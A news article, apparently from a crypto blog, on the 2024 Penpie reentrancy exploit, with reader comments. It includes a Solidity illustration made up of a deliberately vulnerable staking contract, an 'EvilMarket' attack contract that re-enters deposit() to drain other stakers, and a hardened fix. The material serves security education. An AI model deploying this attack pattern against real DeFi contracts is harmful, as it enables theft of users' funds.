
Penpie Protocol Drained of $27 Million in Sophisticated Reentrancy Attack

On September 3, 2024, the decentralized finance ecosystem suffered one of its most significant security breaches of the year when Penpie, a yield-enhancement protocol built on the Pendle platform, was exploited for approximately $27 million. The attack exposed critical vulnerabilities in reward distribution mechanisms and served as yet another stark reminder of the risks inherent in DeFi smart contract deployment.

The Exploit Mechanics

The attacker exploited a reentrancy vulnerability in Penpie's _harvestBatchMarketRewards function, a core component of the protocol's staking reward system. A reentrancy attack occurs when a contract makes an external call to another contract before it has finished updating its own state, and the called contract uses that window to call back into the first one. The re-entered function then runs against stale state variables, and the attacker can exploit the difference between what the contract has recorded and what has actually happened.

In this case the attacker deployed a malicious contract and registered it on Penpie as a Pendle market, an "evil market". Penpie's harvest routine called out to that market to collect rewards, and the attacker's contract used the callback to re-enter the protocol and inflate the staking balance credited to it before the stake records had been updated. Each pass through the unguarded harvest function amplified the attacker's apparent holdings, so they could claim a far larger share of rewards than they were entitled to.

The exploited function lacked a reentrancy guard, the standard mutex that rejects a call into a contract while an earlier call into it is still in progress (the complementary defence is the checks-effects-interactions ordering: update state first, make external calls last). Without either safeguard the attacker could run several deposit-and-harvest cycles inside a single transaction, draining roughly $27 million in ERC-20 tokens from the protocol's staking contracts, which the attacker then converted to ETH.
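The pattern described above, as an added Solidity illustration that is not Penpie's, Pendle's or the exploiter's code: the contract, interface and function names and the balance-delta reward accounting are assumptions chosen for this example. The vulnerable staking contract lets anyone register a market, then measures harvested rewards as the change in its token balance across an external call into that market. The evil market uses that call to re-enter deposit(), so its own deposit is booked as reward income, paid out once as "rewards" and then withdrawn again at other stakers' expense. The hardened variant closes both gaps with owner-gated registration and a mutex on every state-changing entry point.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Added illustration, not Penpie's or Pendle's code: every name and the
// balance-delta reward accounting below are assumptions made for this example.

interface IERC20 {
    function balanceOf(address a) external view returns (uint256);
    function transfer(address to, uint256 amt) external returns (bool);
    function transferFrom(address from, address to, uint256 amt) external returns (bool);
    function approve(address spender, uint256 amt) external returns (bool);
}

interface IMarket {   // what the staking contract expects from any registered market
    function rewardToken() external view returns (address);
    function claimRewards(address receiver) external;
}

// VULNERABLE: anyone can register a market, rewards are measured as a balance delta
// around an external call into that market, and nothing stops it re-entering deposit().
contract StakingVulnerable {
    mapping(address => bool) public registered;                     // market => allowed
    mapping(address => mapping(address => uint256)) public staked;  // market => user => LP
    mapping(address => uint256) public totalStaked;                 // market => LP total
    mapping(address => uint256) public pendingRewards;              // market => harvested, unpaid

    function registerMarket(address market) public virtual { registered[market] = true; }

    function deposit(address market, address lp, uint256 amount) public virtual {
        require(registered[market], "unknown market");
        IERC20(lp).transferFrom(msg.sender, address(this), amount);
        staked[market][msg.sender] += amount;
        totalStaked[market] += amount;
    }

    function withdraw(address market, address lp, uint256 amount) public virtual {
        staked[market][msg.sender] -= amount;   // checked math: reverts if over-withdrawing
        totalStaked[market] -= amount;
        IERC20(lp).transfer(msg.sender, amount);
    }

    function harvest(address market) public virtual {
        require(registered[market], "unknown market");
        IERC20 token = IERC20(IMarket(market).rewardToken());
        uint256 before = token.balanceOf(address(this));
        IMarket(market).claimRewards(address(this));          // untrusted code runs here
        pendingRewards[market] += token.balanceOf(address(this)) - before;
    }

    // Pays the caller its share of harvested rewards; a sole staker gets all of them.
    function claim(address market) public virtual {
        uint256 owed = pendingRewards[market] * staked[market][msg.sender] / totalStaked[market];
        pendingRewards[market] -= owed;
        IERC20(IMarket(market).rewardToken()).transfer(msg.sender, owed);
    }
}

// The "evil market": names a legitimate LP token as its reward token and, when
// harvested, re-enters deposit() so its own deposit is booked as reward income.
contract EvilMarket is IMarket {
    StakingVulnerable private immutable staking;
    IERC20 private immutable lp;
    constructor(StakingVulnerable s, IERC20 lpToken) { staking = s; lp = lpToken; }

    function rewardToken() external view override returns (address) { return address(lp); }

    function claimRewards(address) external override {
        uint256 amount = lp.balanceOf(address(this));
        lp.approve(address(staking), amount);
        staking.deposit(address(this), address(lp), amount);   // re-entrant deposit
    }

    // Fund this contract with LP tokens (flash-loaned in practice), then call attack().
    function attack() external {
        staking.registerMarket(address(this));
        staking.harvest(address(this));   // our deposit lands inside the balance delta
        staking.claim(address(this));     // paid out once as "rewards"...
        staking.withdraw(address(this), address(lp), staking.staked(address(this), address(this)));
    }   // ...and withdrawn again: the second payout comes from other stakers' LP
}

// HARDENED: owner-gated registration plus a mutex on every state-changing entry
// point; the re-entrant deposit() inside harvest() now reverts.
contract StakingHardened is StakingVulnerable {
    address public immutable owner;
    uint256 private lock = 1;
    constructor() { owner = msg.sender; }

    modifier nonReentrant() {
        require(lock == 1, "reentrant call");
        lock = 2; _; lock = 1;
    }

    function registerMarket(address market) public override {
        require(msg.sender == owner, "not owner");
        super.registerMarket(market);
    }
    function deposit(address m, address lp, uint256 a) public override nonReentrant { super.deposit(m, lp, a); }
    function withdraw(address m, address lp, uint256 a) public override nonReentrant { super.withdraw(m, lp, a); }
    function harvest(address m) public override nonReentrant { super.harvest(m); }
    function claim(address m) public override nonReentrant { super.claim(m); }
}
```

Two points worth noting from the example. First, checks-effects-interactions alone cannot fix harvest(): the effect (crediting rewards) depends on the result of the interaction (the balance after the external call), so the state update has to come after the call, and only a mutex stops a deposit from sneaking into that window. Second, the mutex is only half of the fix; as long as arbitrary contracts can register as markets, the protocol is executing attacker-chosen code from inside its own accounting, so registration has to be gated as well, and a reward-token allowlist that excludes the LP tokens the contract itself accepts as deposits would remove the remaining overlap between "reward income" and "user deposits".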

Affected Systems

Penpie operates as a decentralized application on Ethereum and Arbitrum, built on top of the Pendle Finance platform. The breach impacted users who had staked assets in Penpie’s yield-enhancement vaults. Following the discovery of the exploit, the Penpie team immediately suspended all deposits and withdrawals across the platform, halting operations to prevent further losses.

With Bitcoin trading at approximately $57,431 and Ethereum at $2,420 at the time of the attack, the broader market was already experiencing significant downward pressure. The Penpie exploit added to the negative sentiment, contributing to concerns about DeFi protocol safety during a period of heightened market volatility.

The stolen funds, totaling roughly $27 million, began moving through Tornado Cash, a sanctioned cryptocurrency mixer that obscures transaction origins, soon after the attack. Approximately $7 million had passed through the mixer within hours, according to blockchain analytics reports.

The Mitigation Strategy

In the immediate aftermath, Penpie’s response team took several steps to contain the damage. The protocol filed official complaints with both the Singapore Police Force and the United States Federal Bureau of Investigation, seeking law enforcement assistance in tracing and recovering the stolen assets.

The team also sent an on-chain message to the attacker, offering a negotiated bounty payment in exchange for the safe return of funds. “We acknowledge your exploit of our protocol,” the message read. “Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned.” This approach mirrors strategies employed by other DeFi protocols that have successfully negotiated with hackers in the past.

However, the Penpie hacker showed no intention of returning the stolen assets. In a bizarre twist, the infamous Euler Finance hacker — responsible for a $195 million DeFi heist in 2023 — left an on-chain message praising the Penpie attacker for keeping the funds.

Lessons Learned

The Penpie exploit underscores several critical lessons for the DeFi ecosystem. First, reentrancy vulnerabilities remain one of the most common and devastating attack vectors in smart contract security. The bug class has been well understood since the infamous DAO hack of 2016, yet protocols continue to ship code with insufficient reentrancy protection, particularly where an external call lands in the middle of a state update rather than at the end of it.

Second, the speed at which stolen funds were laundered through Tornado Cash highlights the challenges of fund recovery in DeFi. Even with law enforcement involvement, the use of mixing services makes tracing and recovering stolen assets extremely difficult.

Third, the total value lost to crypto hacks in 2024 surpassed $1.2 billion by September, representing a 15.5% increase over the previous year. This upward trend in losses demands a fundamental rethinking of how DeFi protocols approach security auditing and deployment.

User Action Required

If you were a user of the Penpie protocol, you should immediately revoke any token approvals granted to Penpie smart contracts. Note that revoking an approval protects tokens still held in your wallet; it does not recover assets already deposited in the protocol. Monitor the official Penpie communication channels for updates on fund recovery efforts and potential reimbursement plans. All DeFi users should regularly review their active token allowances using tools like Revoke.cash or similar platforms, and never grant unlimited approvals unless absolutely necessary.

Disclaimer: This article is for informational purposes only and does not constitute financial or investment advice. Always conduct your own research before engaging with any DeFi protocol.


11 thoughts on “Penpie Protocol Drained of $27 Million in Sophisticated Reentrancy Attack”

  1. Evil market contract is a nasty trick. You trust the protocol to handle market registration and the attacker weaponizes that trust.

    1. The evil market trick is clever from the attacker side. Register a legitimate-looking market, inflate balance, drain rewards. Trust was the vulnerability.

  2. Another reentrancy bug in 2024. This was literally the DAO hack vector from 2016. How are teams still shipping code without checks-effects-interactions?

    1. Checks-effects-interactions doesn't save you when the contract architecture itself lets external contracts register as markets. The bug was deeper than a missing guard.

    2. The DAO hack was 2016 and Penpie was 2024. 8 years and devs still ship the same vulnerability. Unreal.

      1. 8 years and reentrancy is still the #1 exploit vector. At some point you have to blame the hiring pipeline, not the language.

  3. I had a small position in Pendle that I pulled out when Penpie launched. Something about restaking on top of yield trading felt like stacking risk unnecessarily.

  4. The _harvestBatchMarketRewards function was clearly missing proper state updates before external calls. Attacker registers evil market, inflates balance, then drains $27M before records catch up. Classic reentrancy but executed on market registration trust.

  5. Penpie lost $27 million on Sept 3 because anyone could deploy a malicious smart contract as a market. Inflating staking balance and hammering the harvest function before updates is exactly why market registration needs strict controls.
